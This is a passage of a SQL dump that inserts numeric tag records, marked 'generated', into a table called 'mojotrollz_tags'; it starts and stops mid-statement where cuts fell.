(`id`, `table`, `type`, `value`, `comment`) VALUES (1557, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1557, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1558, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1558, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1559, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1559, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1560, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1560, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1561, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1561, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1562, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1562, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1563, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1563, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1564, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1564, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1565, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1565, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1568, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1568, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1569, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1569, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1570, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1570, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1571, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1571, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1572, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1572, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1573, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1573, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1632, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1632, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1642, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1642, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1645, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1645, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1646, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1646, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1650, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1650, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1651, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1651, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1652, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1652, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1653, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1653, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1654, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1654, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1655, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1655, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1656, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1657, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1657, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1658, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1658, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1660, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1660, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1661, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1661, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1662, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1662, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1663, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1663, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1663, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1664, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1664, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1665, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1665, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1666, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1666, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1666, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1667, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1667, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1668, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1668, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1669, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1669, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1670, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1670, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1671, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1671, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1672, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1672, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1673, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1673, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1674, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1674, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1675, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1675, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1676, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1676, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1678, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1678, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1679, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1679, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1680, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1680, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1681, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1681, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1682, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1682, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1683, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1683, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1684, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1684, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1685, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1685, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1686, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1686, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1687, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1687, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1688, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1688, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1689, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1689, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1690, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1690, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1691, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1691, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1692, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1692, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1693, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1693, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1694, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1694, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1695, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1695, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1696, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1696, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1696, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1697, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1697, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1698, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1699, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1700, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1700, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1701, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1701, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1702, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1702, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1703, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1703, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1706, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1706, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1706, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1707, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1707, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1707, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1708, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1708, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1708, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1711, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1711, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1711, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1713, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1713, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1715, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1715, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1715, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1716, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1716, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1716, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1717, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1717, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1717, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1718, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1718, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1719, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1719, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1720, 1, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1720, 1, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1720, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1721, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1721, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1725, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1725, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1725, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1726, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1726, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1727, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1727, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1729, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1729, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1729, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1731, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1731, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1731, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1732, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1732, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1732, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1733, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1733, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1735, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1735, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1736, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1737, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1738, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1738, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1739, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1740, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1740, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1741, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1741, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1742, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1742, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1743, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1743, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1744, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1744, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1745, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1745, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1746, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1746, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1747, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1747, 1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1747, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1748, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1748, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1749, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1749, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1750, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1750, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1751, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1751, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1752, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1752, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1753, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1753, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1754, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1754, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1755, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1756, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1756, 